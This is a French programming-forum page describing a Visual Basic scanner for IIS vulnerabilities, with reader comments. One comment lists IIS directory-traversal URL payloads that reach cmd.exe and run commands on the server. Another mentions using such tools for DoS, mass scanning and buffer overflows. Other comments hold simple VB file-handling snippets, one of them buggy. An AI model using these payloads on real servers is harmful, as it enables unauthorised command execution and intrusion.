Scanneur de failles iis

Soyez le premier à donner votre avis sur cette source.

Vue 15 360 fois - Téléchargée 1 176 fois

Description

C'est un simple scanneur de failles IIS. Il suffit d'entrer l'url d'un site, et le programme teste si celui-ci est affecté par la faille IIS. Pour l'instant, il ne teste pas beaucoup de failles mais l'interêt principal de la source est l'utilisation du contrôle Inet qui permet d'ouvrir une URL et de recevoir le résultat de la requête (on obtient le contenu de la page HTML si celle-ci existe). Bon codage à tous

Source / Exemple :


tout est dans le zip

Conclusion :


j'essayerais de rajouter des failles toutes les semaines.

Source prise dans la magazine "Hackerz Voice" (juin)
+ rajout d'autres failles signalées et trouvées sur le net

Codes Sources

A voir également

Ajouter un commentaire

Commentaires

78zerocool
Messages postés
22
Date d'inscription
jeudi 13 janvier 2011
Statut
Membre
Dernière intervention
20 juillet 2011
-
de meme enregistrement de ta textBox dans un fichier txt

Sub cmdSave_Click()
Dim Temp as string ' declaration du contenue du text
Temp = Text1.Text ' attribution de la valeur du text
Dim Filename as string
Filename = InputBox("Entrez un nom de fichier :",Me.Caption)
Open App.Path & Filename & ".txt" For Output as #1 ' Ouverture
Print#1 , Temp ' Ecriture sans le string
Close#1 ' fermeture
MsgBox "Fichier enregistré avec succes !", _
vbinformation ,Me.Caption
End Sub
78zerocool
Messages postés
22
Date d'inscription
jeudi 13 janvier 2011
Statut
Membre
Dernière intervention
20 juillet 2011
-
1/Comment je peux faire pour afficher tout le contenu d'un fichier texte dans une textbox ?

tu mais un boutton et tu le nomme cmdOpen
On dit que ta textbox de destination se nomme Text1

apres tu mais ton fichier .txt a la racine de ton prog et dans le boutton tu mets :

Sub cmdOpen_Click()
Dim Temp as string ' declaration du contenue du text
Open App.Path & "\Montxt.txt" For Input as #1 ' Ouverture
Print#1 , Temp ' Ecriture sans le string
Close#1 ' fermeture
Text1.Text = Temp ' attribution de la valeur du text
End Sub
cs_Cerbere
Messages postés
6
Date d'inscription
dimanche 1 décembre 2002
Statut
Membre
Dernière intervention
1 décembre 2002
-
Il faut tout de même avouer que ce code est d'une lenteur insupportable. Je pense qu'il faudrait plutôt utiliser des sockets et réccupérer uniquement les éléments de l'head nécessaire pour faire tourner l'appli, de plus je pense qu'il n'ai pas necessaire de continuer de faire tourner l'appli une fois que l'on a trouvé une faille, c'est une perte de temps (a moins d'être collectionneur de failles IIS ...). Enfin, je pense qu'il faudrait aller plus loin dans l'appli et automatiser les procédures, comme la génération de rep et de creation de fichier afin d'uploader, tout ça sous forme de fichier texte que l'on pourrait personnaliser a sa guise. Bon si je vous dit ça c'est que j'en ai fais un petit programme en Delphi qui fonctionne très bien et c'est pratique pour faire des PubStros, D.o.S, mass scan ou encore des bufferoverflows. Je pense qu'en VB ce doit être faisable, donc je vais m'y mettre dès que j'aurais un peu, je vous tiendrais au courrant des évolutions.

Pour terminer, je voulais juste vous informer que le ministre de la sécurité des US est en train de redefinir les lois concernant tout le secteur informatique. A vrai dire jusque là tout va bien ... mise a part les peines qui sont complètements absurdes !

( Extrait : le CSEA (Cyber Security Enhancement Act), a été rajouté en dernière minute au Homeland Security bill. Il étend les pouvoirs de la police en lui permettant d'effectuer des écoutes téléphoniques ou sur le net sans mandat. L'autre point clé concerne les fournisseurs d'accès internet, qui pourront avec plus de latitude communiquer à la police des informations concernant leurs abonnés. Enfin, les hackers ayant agi délibérément pour nuire seront passibles de peine de prison à vie.)

Pour conclure une p'tite phrase de BuSh :
«Une souris peut être aussi dangereuse qu'une balle ou une bombe»

Tout ça pour dire que faudra a un moment donné réduire l'utilisation de nos p'tits scanner iis, sql, netbios, ipc, etc ... snif !
Skywalker13
Messages postés
111
Date d'inscription
dimanche 6 janvier 2002
Statut
Membre
Dernière intervention
27 août 2004
-
qques une ...

/scripts/root.exe?/c+dir
/MSADC/root.exe?/c+dir
/c/winnt/system32/cmd.exe?/c+dir
/d/winnt/system32/cmd.exe?/c+dir
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
Zepetitlutin
Messages postés
22
Date d'inscription
dimanche 14 juillet 2002
Statut
Membre
Dernière intervention
14 mai 2004
-
Tout à fait vrai, je vais de suite réparer ceci... Néanmoins je ne comptais pas m'attribuer le mérite de cette source...

Vous n'êtes pas encore membre ?

inscrivez-vous, c'est gratuit et ça prend moins d'une minute !

Les membres obtiennent plus de réponses que les utilisateurs anonymes.

Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes et codes sources.

Le fait d'être membre vous permet d'avoir des options supplémentaires.